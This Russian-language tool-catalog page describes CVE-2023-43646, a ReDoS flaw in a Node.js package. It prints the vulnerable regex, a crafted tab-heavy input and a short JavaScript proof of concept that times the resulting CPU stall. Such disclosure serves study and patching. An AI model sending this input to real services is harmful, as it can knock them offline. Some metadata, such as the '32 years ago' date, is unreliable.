Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-43646 — redos | Kitploit
Инструменты/GitHubGitHub/200101whoami/cve-2023-43646
Сканеры уязвимостейАнализ уязвимостейАнализ КодаСтатьи и ИсследованияОбучение и Образование
GitHub200101whoami/cve-2023-43646

CVE-2023-43646

redos

Репозиторий
32 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-43646

Обзор уязвимости

  • CVE-2023-43646

  • CVSS : 8.6

  • Sep 26, 2023

  • ReDoS в пакете node.js

  • в рамках проекта rebob

Описание уязвимости

github advisories

root@kitploit:~
/\sfunction(?:\s|\s/[^(?:*\/)]+/\s*)*([^\(\/]+)/

Эта уязвимость может быть использована при дисбалансе скобок, что приводит к чрезмерному возврату (backtracking) и, как следствие, значительно увеличивает нагрузку на процессор и время обработки. Эту уязвимость можно вызвать с помощью следующего ввода:

root@kitploit:~
'\t'.repeat(54773) + '\t/function/i'

Вот простой код PoC, демонстрирующий проблему:

root@kitploit:~
const protocolre = /\sfunction(?:\s|\s/[^(?:*\/)]+/\s*)*([^\(\/]+)/;

const startTime = Date.now();
const maliciousInput = '\t'.repeat(54773) + '\t/function/i'

protocolre.test(maliciousInput);

const endTime = Date.now();

console.log("process time: ", endTime - startTime, "ms");

target package

Скачать инструмент